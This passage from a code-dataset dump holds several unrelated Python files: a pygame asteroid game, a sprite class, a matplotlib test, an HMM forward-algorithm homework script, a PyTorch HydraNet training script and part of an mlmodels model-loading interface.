\"GAMEPLAY\"\n self.menu = Menu([\n Button(\"Start\", ((SCREEN_SIZE[0] / 2) - 125, 300, 250, 40)),\n Button(\"Credits\", ((SCREEN_SIZE[0] / 2) - 125, 350, 250, 40))\n ])\n self.sound = Sound(\"assets/sound/MainTheme.wav\")\n self.sound.play()\n\n def startup(self, persistent):\n self.sound.play()\n self.menu.select_option(0)\n\n def get_event(self, event):\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.menu.select_option(-1)\n elif event.key == pygame.K_DOWN:\n self.menu.select_option(1)\n elif event.key == pygame.K_RETURN:\n self.next_state = \"GAMEPLAY\" if self.menu.selected_option == 0 else \"CREDITS\"\n self.persist[\"selected_option\"] = self.menu.selected_option\n self.done = True\n self.sound.stop()\n\n def draw(self, surface):\n surface.fill(Color(\"black\"))\n background = pygame.image.load(\"assets/images/nave.png\").convert()\n background.set_colorkey((255, 255, 255))\n surface.blit(background, [(SCREEN_SIZE[0] / 2) - 250, (SCREEN_SIZE[1] / 2) - 140])\n surface.blit(self.title, self.title_rect)\n self.menu.draw(surface)\n\n def update(self, surface):\n self.menu.update()\n\nclass Credits(GameState):\n def __init__(self):\n super(Credits, self).__init__()\n self.font = pygame.font.Font(SUB_TITLE_FONT[0], 34)\n self.title = self.font.render(\"CREDITS\", True, (255, 255, 255))\n self.title_rect = self.title.get_rect(x=(SCREEN_SIZE[0] / 2) - 80, y=50)\n self.next_state = \"SPLASH\"\n self.menu = Menu([\n Button(\"Back\", ((SCREEN_SIZE[0] / 2) - 125, 390, 250, 40), active = True)\n ])\n\n def get_event(self, event):\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n self.done = True\n\n def draw(self, surface):\n surface.fill(Color(\"black\"))\n surface.blit(self.title, 
self.title_rect)\n self.menu.draw(surface)\n\n center = SCREEN_SIZE[0] / 2\n\n Text((100, 20), (center - 50, 200), \"Author\",\n pygame.font.Font(SUB_TITLE_FONT[0], 18),\n Color(\"white\")\n ).draw(surface)\n\n Text((100, 20), (center - 50, 230), \"Jose Saldana\",\n pygame.font.Font(None, 25),\n Color(\"white\")\n ).draw(surface)\n\n Text((100, 20), (center - 50, 280), \"Group\",\n pygame.font.Font(SUB_TITLE_FONT[0], 18),\n Color(\"white\")\n ).draw(surface)\n\n Text((100, 20), (center - 50, 310), \"1LS-231\",\n pygame.font.Font(None, 25),\n Color(\"white\")\n ).draw(surface)\n\nclass Gameplay(GameState):\n def __init__(self):\n super(Gameplay, self).__init__()\n\n self.game_over = False\n self.game_paused = False\n self.level_completed = False\n\n self.player = Player(INITIAL_POSITION)\n self.missiles = Group()\n\n self._100pts_asteroids = pygame.sprite.Group()\n self._500pts_asteroids = pygame.sprite.Group()\n self.asteroids = pygame.sprite.Group()\n self.asteroids.add(self._100pts_asteroids)\n self.asteroids.add(self._500pts_asteroids)\n\n self.explosions_group = Group()\n self.player_hits_group = Group()\n\n self.sound = Sound(\"assets/sound/FranticLevel.wav\")\n self.level_complete_sound = Sound(\"assets/sound/HappyLevel.wav\")\n self.game_over_sound = Sound(\"assets/sound/oops.wav\")\n\n def startup(self, persistent):\n self.persist = persistent\n color = self.persist[\"screen_color\"]\n self.screen_color = pygame.Color(color)\n\n # 100 Points asteroids\n self._100pts_asteroids.add([Asteroid100Points() for i in range(0, randint(1, 40))])\n self.asteroids.add(self._100pts_asteroids)\n\n # 200 Points asteroids\n self._500pts_asteroids.add([Asteroid500Points() for i in range(0, randint(1, 10))])\n self.asteroids.add(self._500pts_asteroids)\n\n self.sound.play(loops = -1)\n\n def get_event(self, event):\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.MOUSEBUTTONDOWN:\n missile = self.player.shot(screen)\n self.missiles.add(missile)\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.game_paused = False if self.game_paused == True else True\n\n def update(self, dt):\n if not self.game_paused:\n # Asteroid hit by missile\n for m in self.missiles.sprites():\n collided_asteroids = spritecollide(m, self.asteroids, True)\n\n for collided_asteroid in collided_asteroids:\n if not self.game_over:\n self.player.score += collided_asteroid.points\n\n # Explosion\n explosion = AsteroidExplosion(collided_asteroid.rect)\n self.explosions_group.add(explosion)\n explosion.sound.play()\n\n # Remove both asteroid and missile\n collided_asteroid.kill()\n m.kill()\n\n if len(self.asteroids.sprites()) == 0:\n self.level_completed = True\n\n # Ship hit by asteroid\n collided_asteroids = spritecollide(self.player, self.asteroids, True)\n\n if len(collided_asteroids) > 0:\n self.player_hits_group.add(self.player.hit())\n\n if not self.game_over:\n collided_points = map((lambda a: a.points / 20), collided_asteroids)\n self.player.lifes -= reduce((lambda x, y: x + y), collided_points, 0)\n\n if self.player.lifes <= 0:\n self.game_over = True\n\n # Sprites and groups update\n self.player.update()\n self.asteroids.update()\n self.missiles.update()\n self.explosions_group.update()\n self.player_hits_group.update()\n\n def draw(self, surface):\n # Set background\n surface.fill(self.screen_color)\n background = pygame.image.load(\"assets/images/saturn.jpg\").convert()\n surface.blit(background, [0, 0])\n\n # Draw player\n self.player.position = 
pygame.mouse.get_pos()\n surface.blit(self.player.image, self.player.rect)\n\n # Draw asteroids\n self.asteroids.draw(surface)\n self.missiles.draw(surface)\n self.explosions_group.draw(surface)\n self.player_hits_group.draw(surface)\n\n # Draw title bar\n pygame.draw.rect(surface, Color(\"black\"), [0, 0, SCREEN_SIZE[0], 50])\n\n # Blit Title\n title_font = pygame.font.Font(MAIN_TITLE_FONT[0], 28)\n title = title_font.render(GAME_TITLE, True, Color(\"white\"))\n surface.blit(title, [(SCREEN_SIZE[0] / 2) - 100, 10])\n\n # Draw the title bar\n self.draw_title_bar(surface)\n\n # Draw Game Paused\n if self.game_paused and not (self.level_completed or self.game_over):\n self.draw_game_paused(surface)\n\n # Draw Level Completed\n if self.level_completed and not self.game_over:\n self.draw_level_complete(surface)\n self.sound.stop()\n self.level_complete_sound.play()\n\n # Draw Game Over if applicable\n if self.game_over:\n self.draw_game_over(surface)\n self.sound.stop()\n self.game_over_sound.play()\n\n def draw_title_bar(self, surface):\n sub_title_font = pygame.font.Font(SUB_TITLE_FONT[0], 18)\n score = sub_title_font.render(\"Score: \" + str(self.player.score), True, Color(\"white\"))\n lifes = sub_title_font.render(\"Lifes: \", True, Color(\"white\"))\n surface.blit(score, [20, 20])\n surface.blit(lifes, [SCREEN_SIZE[0] - 150, 20])\n life_img = pygame.image.load(\"assets/images/life.png\").convert()\n for life in range(0, self.player.lifes / 25):\n surface.blit(life_img, [(SCREEN_SIZE[0] - 80) + (life * 20), 25])\n\n def draw_game_over(self, surface):\n text_font = pygame.font.Font(SUB_TITLE_FONT[0], 70)\n game_over_text = text_font.render(\"GAME OVER\", True, Color(\"red\"))\n surface.blit(game_over_text, [(SCREEN_SIZE[0] / 2) - 160, (SCREEN_SIZE[1] / 2) - 30])\n\n def draw_level_complete(self, surface):\n text_font = pygame.font.Font(SUB_TITLE_FONT[0], 40)\n game_over_text = text_font.render(\"Level Completed\", True, Color(\"white\"))\n surface.blit(game_over_text, [(SCREEN_SIZE[0] / 2) - 150, (SCREEN_SIZE[1] / 2) - 20])\n\n def draw_game_paused(self, surface):\n text_font = pygame.font.Font(SUB_TITLE_FONT[0], 40)\n game_over_text = text_font.render(\"Paused\", True, Color(\"white\"))\n surface.blit(game_over_text, [(SCREEN_SIZE[0] / 2) - 100, (SCREEN_SIZE[1] / 2) - 20])\n\n### Main Entry Point ###\nif __name__ == \"__main__\":\n pygame.init()\n pygame.font.init()\n pygame.mixer.init()\n\n screen = pygame.display.set_mode(SCREEN_SIZE)\n\n pygame.mouse.set_visible(False)\n pygame.mouse.set_pos(INITIAL_POSITION)\n\n states = {\n \"SPLASH\": SplashScreen(),\n \"GAMEPLAY\": Gameplay(),\n \"CREDITS\": Credits()\n }\n\n game = Game(screen, states, \"SPLASH\")\n game.run()\n\n pygame.quit()\n sys.exit()\n","sub_path":"unreal_space.py","file_name":"unreal_space.py","file_ext":"py","file_size_in_byte":16162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313580420","text":"import pygame\nfrom pygame.sprite import Sprite\nfrom random import randint\n\n\nclass Ball(Sprite):\n \"\"\"class to represent the ball on the surface\"\"\"\n def __init__(self, settings, screen):\n super(Ball, self).__init__()\n self.screen = screen\n self.settings = settings\n\n self.image = pygame.image.load(r'D:\\Code\\images\\ball.bmp')\n self.rect = self.image.get_rect()\n self.rect.x = randint(100, 1100 )\n self.rect.y = self.rect.height\n\n self.x = float(self.rect.x)\n self.y = float(self.rect.y)\n\n # Ball speed settings\n\n\n\n def update(self):\n self.y += 
self.settings.ball_speed_factor\n\n if self.y >= self.settings.screen_height:\n self.y = -self.rect.height\n self.rect.x = randint(10, 1150)\n self.rect.y = self.y\n\n\n\n\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)\n","sub_path":"Chapter 13 - Aliens/13-5 Catch/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491930643","text":"import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef plotPoints( ):\n\n list_of_lists = [[1, 2], [3, 3], [4, 4], [5, 2]]\n x_list = [x for [x, y] in list_of_lists]\n y_list = [y for [x, y] in list_of_lists]\n # plt.plot([1,2], [2,3], 'or')\n # plt.plot([1,2], [3,4], 'ob')\n plt.scatter(1,2, color='r')\n plt.scatter(2,3, color='b')\n plt.axis([0, 5, 0, 5])\n #plt.plot([2,3], 'b')\n plt.show(block=True)\n\n\ndef printme( str ):\n #\"This prints a passed string into this function\"\n print (str)\n return\n\nprintme(\"hello\")\nplotPoints()","sub_path":"NeuralNetworks/hw1/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557804789","text":"\nA = [[0.7, 0.3],\n [0.4, 0.6]]\nB = [[0.1, 0.4, 0.5],\n [0.7, 0.2, 0.1]]\npi = [0.6, 0.4]\n\nS = 0;\nM = 1;\nL = 2\nSet1 = [0, 1, 2]\n\nO = []\ntotalsum = 0\n\nfor a in range(3):\n for b in range(3):\n for c in range(3):\n for d in range(3):\n O.append([a, b, c, d])\n\nN = len(pi) # total states\nM = len(O[0]) # total observations\n#print(N, M)\n#print(O)\nprint(\"M = \",M)\n# compute alpha zero\nfor step in range(81):\n alpha = [[0.0 for i in range(N)] for _ in range(M)]\n sum = 0.0\n # print(alpha)\n for i in range(N):\n alpha[0][i] = (pi[i] * B[i][O[step][0]])\n # compute alpha (i)\n for t in range(1, M):\n for i in range(N):\n alpha[t][i] = 0\n for j in range(0, N):\n alpha[t][i] = alpha[t][i] + alpha[t - 1][j] * A[j][i]\n alpha[t][i] = alpha[t][i] * B[i][O[step][t]]\n sum += alpha[M-1][i]\n totalsum += sum\n print(\"Observation : \", O[step])\n print(\"Alpha = \",alpha)\n print(\"Sum = \", sum)\n\n\nprint(\"Total Sum = \",totalsum)\n","sub_path":"CS271HMK_Assignment1_Duong_3857/HW3-b.py","file_name":"HW3-b.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43122838","text":"import argparse\nimport os\nimport time\nfrom typing import *\n\nimport torch\nimport torch.nn\nimport torch.utils.data\nimport torch.optim.optimizer\nimport yaml\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom data import create_datasets_and_loaders_from_args\nfrom data.hydranet_dataset import HydranetDataset\nfrom hydranet import HydraNet\nfrom sr import StyleRandomizer\n\ntry:\n import apex\n from utils.fp16_conversion import convert_network_and_get_optimizer_as_fp16\n\n APEX_AVAILABLE = True\nexcept ModuleNotFoundError as err:\n APEX_AVAILABLE = False\n\n\ndef iters_from_name(checkpoint_name: str) -> int:\n return int(''.join(char for char in checkpoint_name if char.isdigit()))\n\n\ndef save_model(model: torch.nn.Module, checkpoint_dir: str, iters, name: str = \"model\", iters_to_keep=()) -> int:\n checkpoints_to_delete = [path for path in os.listdir(checkpoint_dir) if\n path.endswith('.pth') and iters_from_name(path) not in iters_to_keep]\n path = os.path.join(checkpoint_dir, f'{name}.ckpt-{iters}.pth')\n state_dict = {k.replace('module.', ''): v for k, v in 
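# The brute-force alpha computation in HW3-b.py above can be folded into one
# forward-pass function: alpha_t(i) = b_i(O_t) * sum_j alpha_{t-1}(j) * a_{ji},
# and P(O | lambda) = sum_i alpha_{T-1}(i). A self-contained sketch
# (forward_probability is an assumed name, not from the file above):
def forward_probability(A, B, pi, observation):
    n_states = len(pi)
    alpha = [pi[i] * B[i][observation[0]] for i in range(n_states)]
    for t in range(1, len(observation)):
        alpha = [
            B[i][observation[t]] * sum(alpha[j] * A[j][i] for j in range(n_states))
            for i in range(n_states)
        ]
    return sum(alpha)

# With the A, B, pi defined above, forward_probability(A, B, pi, [0, 1, 2, 1])
# gives the probability of observing the sequence S, M, L, M.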
model.state_dict().items()} # Remove DataParallel artifacts\n torch.save(state_dict, path)\n print('Saved model to', path)\n for cp in checkpoints_to_delete:\n path = os.path.join(checkpoint_dir, cp)\n print('Deleting checkpoint', path)\n os.remove(path)\n\n\ndef save_definition(definition_path: str, backbone_name: str, hydranet: HydraNet):\n print(f'Saving hydranet config to {definition_path}')\n hydranet_definition = {'backbone': backbone_name}\n for name, head in hydranet.heads.items():\n hydranet_definition[name] = {'key': head.key, 'params': head.params}\n with open(definition_path, 'w') as f:\n yaml.dump(hydranet_definition, f)\n\n\ndef move_to_devices(hydranet: HydraNet, gpu_ids: List[int], device: str) -> None:\n print('Using devices:', [f'cuda:{i}' for i in gpu_ids])\n if len(gpu_ids) > 1:\n hydranet.backbone = torch.nn.DataParallel(hydranet.backbone, device_ids=gpu_ids).to(device)\n for head in hydranet.heads:\n hydranet.heads[head] = torch.nn.DataParallel(hydranet.heads[head], device_ids=gpu_ids)\n else:\n hydranet.backbone.to(device)\n\n\ndef load_weights_and_get_iteration_from_checkpoint(hydranet: HydraNet, checkpoint_dir: str, exp_name: str = None, reset_iter=False, sloppy=False, backbone_only=False) -> int:\n if os.path.isfile(checkpoint_dir):\n checkpoint_path = checkpoint_dir\n state_dict = torch.load(checkpoint_path, map_location='cpu')\n else:\n if exp_name is None:\n head_tail = os.path.split(checkpoint_dir)\n exp_name = head_tail[0].split('/')[-1]\n sortkey = lambda x: int(''.join([c for c in x if c.isdigit()]))\n\n checkpoints = sorted([path for path in os.listdir(checkpoint_dir) if path.endswith('pth')],\n key=sortkey)\n if len(checkpoints) < 1:\n raise ValueError(f'No checkpoints to load from in {checkpoint_dir} for {exp_name}')\n checkpoint_path = checkpoints[-1]\n state_dict = torch.load(os.path.join(checkpoint_dir, checkpoint_path))\n if reset_iter:\n iteration = 0\n else:\n iteration = int(''.join([c for c in os.path.basename(checkpoint_path) if c.isdigit()]))\n if backbone_only:\n for key in list(state_dict.keys()):\n if \"backbone\" not in key:\n del state_dict[key]\n print(f'Loading {checkpoint_path}, setting iteration as {iteration}')\n strict = not sloppy \n hydranet.load_state_dict(state_dict, strict=strict)\n return iteration\n\n\ndef parse_device_from_args(args) -> str:\n device = f'cuda:{args.gpu_ids[0]}' if torch.cuda.is_available() else 'cpu'\n return device\n\n\ndef parse_str_to_device(device_str):\n if device_str == 'cpu':\n return 'cpu'\n elif device_str.isdigit():\n return 'cuda:' + device_str\n elif device_str.startswith('cuda:'):\n return device_str\n else:\n raise ValueError('Invalid device ID. use \"cpu\", \"cuda:#\" or \"#\" where # is GPU number. Got:' + device_str)\n\ndef init_style_randomizer(p=None, device='0') -> None:\n device = parse_str_to_device(device)\n StyleRandomizer.set_default_device(device)\n if p is not None:\n if 0 <= p <= 1.0:\n StyleRandomizer.get_instance(p)\n else:\n raise ValueError('Style randomization probability must be in range [0, 1]')\n\n\ndef process_arguments(args: argparse.Namespace) -> tuple:\n # Arg checks\n if args.avg_grad and args.clip_grad_norm:\n raise ValueError(\"Joint gradient averaging clipping is not supported\")\n if args.half and not APEX_AVAILABLE:\n raise ModuleNotFoundError('apex module needed for half-precision training. 
Install from ' +\n 'https://github.com/NVIDIA/apex')\n args.save_points.append(args.maxit)\n args.pretrained = bool(args.pretrained)\n exp_name = args.checkpoint_dir\n if exp_name.endswith('/'):\n exp_name = exp_name[:-1]\n exp_name = os.path.basename(exp_name)\n definition_path = os.path.join(args.checkpoint_dir, exp_name + '.yaml')\n device = parse_device_from_args(args)\n\n if len(args.learning_rate) == 1:\n args.learning_rate = args.learning_rate[0]\n\n # Create checkpoint directory if needed\n os.makedirs(args.checkpoint_dir, exist_ok=True)\n return definition_path, device, exp_name\n\n\ndef init_optimizer(network: torch.nn.Module, lr: Union[float, List[float]]):\n # If network is wrapped in DataParralel, extract it\n network = network.module if hasattr(network, 'module') else network\n if type(lr) == list:\n optimizer = torch.optim.AdamW([{'params': network.backbone.parameters(), 'lr': lr[0]}, {'params': network.heads.parameters(), 'lr': lr[1]}])\n\n else:\n optimizer = torch.optim.AdamW([{'params': network.backbone.parameters()}, {'params': network.heads.parameters()}], lr=lr)\n return optimizer\n\n\ndef init_scheduler(args, optimizer):\n if args.scheduler == 'decay':\n return torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=args.decay)\n elif args.scheduler == '1cycle':\n return torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr=args.learning_rate, total_steps=args.maxit)\n else:\n raise ValueError(\"Scheduler \" + args.scheduler + \" is not supported\")\n\n\n\ndef train():\n parser = argparse.ArgumentParser()\n # Required params\n parser.add_argument('checkpoint_dir', type=str, help='Where to save checkpoints')\n parser.add_argument('configs', nargs='+', help='Path to dataset config files')\n # Hyperparams\n parser.add_argument('-i', '--maxit', type=int, default=5000, help='Max number of iterations to train')\n parser.add_argument('-s', '--save_iterations', type=int, default=300, help='After how many iterations to save')\n parser.add_argument('-b', '--batch_size', type=int, default=3, help='Batch size')\n parser.add_argument('-lr', '--learning_rate', type=float, nargs='+', default=[1e-4, 3e-3], help='Learning rate(s). Max lr for 1cycle. If given 2 LRs, first is for backbone, and second is for heads')\n parser.add_argument('-d', '--decay', type=float, default=0.9, help='Exponential learning rate decay power')\n parser.add_argument('-di', '--decay_iters', type=int, default=300, help='Decay step after how many iterations. For 1cycle it is the number of iterations in a cycle')\n parser.add_argument('-sr', type=float, default=0.5, help='Style Randomization probability')\n # Loading parameters\n parser.add_argument('--continue_ckpt', action='store_true', help='Load latest checkpoint from checkpoint_dir')\n parser.add_argument('--load_from', type=str, help='Load weights from given checkpoint or checkpoint directory')\n parser.add_argument('--reset_iter', action='store_true', help=\"When loading checkpoint, always start with iteration 0\")\n parser.add_argument('--sloppy_load', action='store_true', help=\"Do not load weights strictly\")\n parser.add_argument('--load_backbone_only', action='store_true', help=\"Load backbone only\")\n # Logging\n parser.add_argument('-l', '--log_iterations', type=int, default=100, help='After how many iterations log predictions')\n parser.add_argument('--save_points', type=int, nargs='*', help='Iterations which to save. 
Latest one is always saved', default=[])\n # Misc\n parser.add_argument('--backbone', type=str, default='resnet101', help='Hydranet backbone to use')\n parser.add_argument('--freeze_backbone', action='store_true', help='Freeze backbone (only train heads)')\n parser.add_argument('--pretrained', type=int, default=1)\n parser.add_argument('--gpu_ids', nargs='+', type=int, help=\"Devices to use with DataParallel\", default=[0])\n # Advanced optimization flags\n parser.add_argument('--avg_grad', action='store_true', help='Average gradients of all datasets')\n parser.add_argument('--clip_grad_norm', action='store_true', help='Clip gradient norms to 1')\n # Half-precision\n parser.add_argument('--half', action='store_true', help='Use half-precision (float16)')\n parser.add_argument('-O', '--opt_level', type=str, choices=['0', '1', '2', '3'], default='1',\n help='Apex FP16 optimization level')\n # Data loader params\n parser.add_argument('--group', action='store_true', help='Concatenate datasets with same name together')\n parser.add_argument('-by', '--group_by', type=str, default='name', help='Group dataset by what parameter (can be put in dataset config). --group flag must be set')\n parser.add_argument('--common_conf', type=str, help='Config to apply to all datasets')\n parser.add_argument('--sr_device', type=str, help='Device to use for for SR', default='0')\n parser.add_argument('-w', '--num_workers', type=int, help=\"Number of separate processes per data loader\", default=0)\n parser.add_argument('--scheduler', type=str, choices=['decay', '1cycle'], default='1cycle', help=\"Learning rate scheduler to use.\")\n parser.add_argument('--upscale_feats', type=float, help=\"Upscale featuremap before input to heads\", default=0)\n # Parse arguments\n args = parser.parse_args()\n\n definition_path, device, exp_name = process_arguments(args)\n init_style_randomizer(args.sr, args.sr_device)\n hydranet = HydraNet.make_from_backbone_name(backbone_name=args.backbone, pretrained=args.pretrained,\n return_all=True, upscale_feats=args.upscale_feats)\n datasets, data_loaders = create_datasets_and_loaders_from_args(args=args, hydranet=hydranet, device=device)\n \n save_definition(definition_path=definition_path, backbone_name=args.backbone, hydranet=hydranet)\n if args.continue_ckpt:\n load_weights_and_get_iteration_from_checkpoint(hydranet, args.checkpoint_dir, reset_iter=args.reset_iter, sloppy=args.sloppy_load, backbone_only=args.load_backbone_only)\n elif args.load_from is not None:\n load_weights_and_get_iteration_from_checkpoint(hydranet, args.load_from, reset_iter=args.reset_iter, sloppy=args.sloppy_load, backbone_only=args.load_backbone_only)\n\n torch.cuda.set_device(device)\n move_to_devices(hydranet=hydranet, gpu_ids=args.gpu_ids, device=device)\n\n if args.freeze_backbone:\n hydranet.backbone.eval()\n for param in hydranet.backbone.parameters():\n param.requires_grad = False\n\n optimizer = init_optimizer(hydranet, lr=args.learning_rate)\n if args.half:\n hydranet, optimizer = convert_network_and_get_optimizer_as_fp16(network=hydranet, optimizer=optimizer,\n opt_level='O' + args.opt_level)\n\n def backward_loss(_loss, _optimizer):\n with apex.amp.scale_loss(_loss, _optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n def backward_loss(_loss, _optimizer=None):\n _loss.backward()\n\n scheduler = init_scheduler(args, optimizer)\n writer = SummaryWriter(os.path.join(args.checkpoint_dir, 'runs', 'run_' + str(time.time())))\n epoch = 0\n done = False\n iteration = 0\n start_time = time.time()\n 
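    # The half-precision branch above leans on apex's dynamic loss scaling:
    # gradients are taken on a scaled loss so small fp16 values do not
    # underflow, then unscaled before the optimizer step. The core pattern
    # (assuming apex.amp.initialize was applied to the model/optimizer pair):
    #
    #     with apex.amp.scale_loss(loss, optimizer) as scaled_loss:
    #         scaled_loss.backward()
    #
    # while the full-precision path stays a plain loss.backward().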
while True:\n assert iteration <= args.maxit, f\"Iteration was greater than maxit {iteration} > {args.maxit}\"\n ## Pre-epoch\n # Training loop\n end_time = time.time()\n print(iteration, round(end_time - start_time, 2))\n start_time = time.time()\n\n for data_loader in data_loaders:\n dataset: HydranetDataset = data_loader.dataset\n data = next(data_loader.iterator)\n for key in data:\n data[key] = data[key].to(device)\n\n # if args.half:\n # # Convert data to half precision\n # for key in data:\n # if data[key].dtype != torch.long:\n # data[key] = data[key].half()\n\n loss = dataset.get_loss(data)\n optimizer.zero_grad()\n\n backward_loss(loss, optimizer)\n\n if args.clip_grad_norm:\n torch.nn.utils.clip_grad_norm_(hydranet.parameters(), max_norm=1.0)\n\n if not args.avg_grad:\n optimizer.step()\n\n # Log loss\n writer.add_scalar('loss/' + dataset.get_name(), loss.item(), iteration)\n writer.add_scalar('lr', scheduler.get_lr()[-1], iteration)\n print(dataset.get_name(), loss.item())\n # Keep account of iterations trained for. Stop if done\n iteration += 1\n if iteration == args.maxit:\n save_model(hydranet, args.checkpoint_dir, iteration, name=exp_name, iters_to_keep=args.save_points)\n break\n\n # Save model parameters every ´save_iterations´ iterations\n if iteration % args.save_iterations == 0:\n print('Saving iteration', iteration)\n save_model(hydranet, args.checkpoint_dir, iteration, name=exp_name, iters_to_keep=args.save_points)\n if args.avg_grad:\n for param in hydranet.parameters():\n param.grad /= len(data_loaders)\n optimizer.step()\n if args.scheduler == 'decay' and iteration % args.decay_iters == 0:\n epoch += 1\n scheduler.step(epoch)\n elif args.scheduler == '1cycle':\n scheduler.step()\n\n\n\nif __name__ == '__main__':\n train()\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587633479","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLightweight Functional interface to wrap access to Deep Learning, RLearning models.\nLogic follows Scikit Learn API and simple for easy extentions logic.\nGoal to facilitate Jupyter to Prod. 
models.\n\n\nModels are stored in model_XX/ or in folder XXXXX\n    module : folder/mymodel.py, contains the methods, operations.\n    model  : Class in mymodel.py containing the model definition, compilation\n\n\nmodels.py  #### Generic Interface\n   module_load(model_uri)\n   model_create(module)\n   fit(model, module, session, data_pars, out_pars)\n   metrics(model, module, session, data_pars, out_pars)\n   predict(model, module, session, data_pars, out_pars)\n   save(save_pars)\n   load(load_pars)\n\n\n######### Code sample #############################################################################\nhttps://github.com/arita37/mlmodels/blob/dev/README_model_list.md\n\n\n######### Command line sample #####################################################################\n#### Generate a config file\npython mlmodels/models.py --do generate_config --model_uri model_tf.1_lstm.py --save_folder \"c:\\myconfig\\\"\n\n#### Custom directory models\npython mlmodels/models.py --do test --model_uri \"D:\\_devs\\Python01\\gitdev\\mlmodels\\mlmodels\\model_tf\\1_lstm.py\"\n\n\n### RL model\npython models.py --model_uri model_tf.rl.4_policygradient --do test\n\n### TF DNN model\npython models.py --model_uri model_tf.1_lstm.py --do test\n\n## PyTorch models\npython models.py --model_uri model_tch.mlp.py --do test\n\n\n\"\"\"\nimport argparse\nimport glob\nimport inspect\nimport json\nimport os\nimport re\nimport sys\nfrom importlib import import_module\nfrom pathlib import Path\nfrom warnings import simplefilter\n\n####################################################################################################\nfrom mlmodels.util import (get_recursive_files, load_config, log, os_package_root_path)\n\nfrom mlmodels.util import (env_build, env_conda_build, env_pip_requirement)\n\nsimplefilter(action='ignore', category=FutureWarning)\nsimplefilter(action='ignore', category=DeprecationWarning)\n\n\n####################################################################################################\ndef module_env_build(model_uri=\"\", verbose=0, do_env_build=0):\n    \"\"\"\n      Build the Python environment required by the model (from its requirements.txt).\n      model_uri:  model_tf.1_lstm.py  or ABSOLUTE PATH\n    \"\"\"\n    model_uri = model_uri.replace(\"/\", \".\")\n    if verbose:\n        print(model_uri)\n\n    #### Dynamic env build based on requirements.txt\n    if do_env_build:\n        env_pars = {\"python_version\": '3.6.5'}\n        env_build(model_uri, env_pars)\n\n\ndef module_load(model_uri=\"\", verbose=0, env_build=0):\n    \"\"\"\n      Load the file which contains the model description\n      model_uri:  model_tf.1_lstm.py  or ABSOLUTE PATH\n    \"\"\"\n    model_uri = model_uri.replace(\"/\", \".\")\n    module = None\n    if verbose:\n        print(model_uri)\n\n    try:\n        #### Import from the mlmodels package sub-folder\n        model_name = model_uri.replace(\".py\", \"\")\n        module = import_module(f\"mlmodels.{model_name}\")\n        # module = import_module(\"mlmodels.model_tf.1_lstm\")\n\n    except Exception as e1:\n        try:\n            ### Add the folder to sys.path and load the model from an absolute path\n            path_parent = str(Path(model_uri).parent.absolute())\n            sys.path.append(path_parent)\n\n            #### Import the absolute-path model, e.g. model_tf.1_lstm\n            model_name = Path(model_uri).stem  # remove .py\n            model_name = str(Path(model_uri).parts[-2]) + \".\" + str(model_name)\n            module = import_module(model_name)\n\n        except Exception as e2:\n            raise NameError(f\"Module {model_name} not found, {e1}, {e2}\")\n\n    if verbose: print(module)\n    
return module\n\n\ndef module_load_full(model_uri=\"\", model_pars=None, data_pars=None, compute_pars=None, choice=None, **kwarg):\n \"\"\"\n Create Instance of the model, module\n model_uri: model_tf.1_lstm.py\n \"\"\"\n module = module_load(model_uri=model_uri)\n model = module.Model(model_pars=model_pars, data_pars=data_pars, compute_pars=compute_pars, **kwarg)\n return module, model\n\n\ndef model_create(module, model_pars=None, data_pars=None, compute_pars=None, **kwarg):\n \"\"\"\n Create Instance of the model from loaded module\n model_pars : dict params\n \"\"\"\n if model_pars is None:\n model_pars = module.get_params()\n\n model = module.Model(model_pars=model_pars, data_pars=data_pars, compute_pars=compute_pars, **kwarg)\n return model\n\n\ndef fit(module, model, sess=None, data_pars=None, compute_pars=None, out_pars=None, **kwarg):\n \"\"\"\n Wrap fit generic method\n :type model: object\n \"\"\"\n\n #module, model = module_load_full(model_uri, model_pars, data_pars, compute_pars)\n #sess=None\n return module.fit(model, data_pars=data_pars, compute_pars=compute_pars, out_pars=out_pars, **kwarg)\n\n\ndef predict(module, model, sess=None, data_pars=None, compute_pars=None, out_pars=None, **kwarg):\n \"\"\"\n predict using a pre-trained model and some data\n :return:\n \"\"\"\n # module = module_load(model_uri)\n # model,sess = load(model_pars)\n\n return module.predict(model, sess, data_pars=data_pars, compute_pars=compute_pars, out_pars=out_pars, **kwarg)\n\n\ndef fit_metrics(module, model, sess=None, data_pars=None, compute_pars=None, out_pars=None, **kwarg):\n return module.fit_metrics(model, sess, data_pars, compute_pars, out_pars, **kwarg)\n\n\ndef get_params(module, params_pars, **kwarg):\n return module.get_params(params_pars, **kwarg)\n\n\ndef metrics(module, model, sess=None, data_pars=None, compute_pars=None, out_pars=None, **kwarg):\n return module.metrics(model, sess, data_pars, compute_pars, out_pars, **kwarg)\n\n\ndef load(module, load_pars, **kwarg):\n \"\"\"\n Load model/session from files\n :param folder_name:\n \"\"\"\n return module.load(load_pars, **kwarg)\n\n\ndef save(module, model, session, save_pars, **kwarg):\n \"\"\"\n Save model/session on disk\n \"\"\"\n return module.save(model, session, save_pars, **kwarg)\n\n\n####################################################################################################\n####################################################################################################\ndef test_all(folder=None):\n if folder is None:\n folder = os_package_root_path() + \"/model_tf/\"\n\n # module_names = 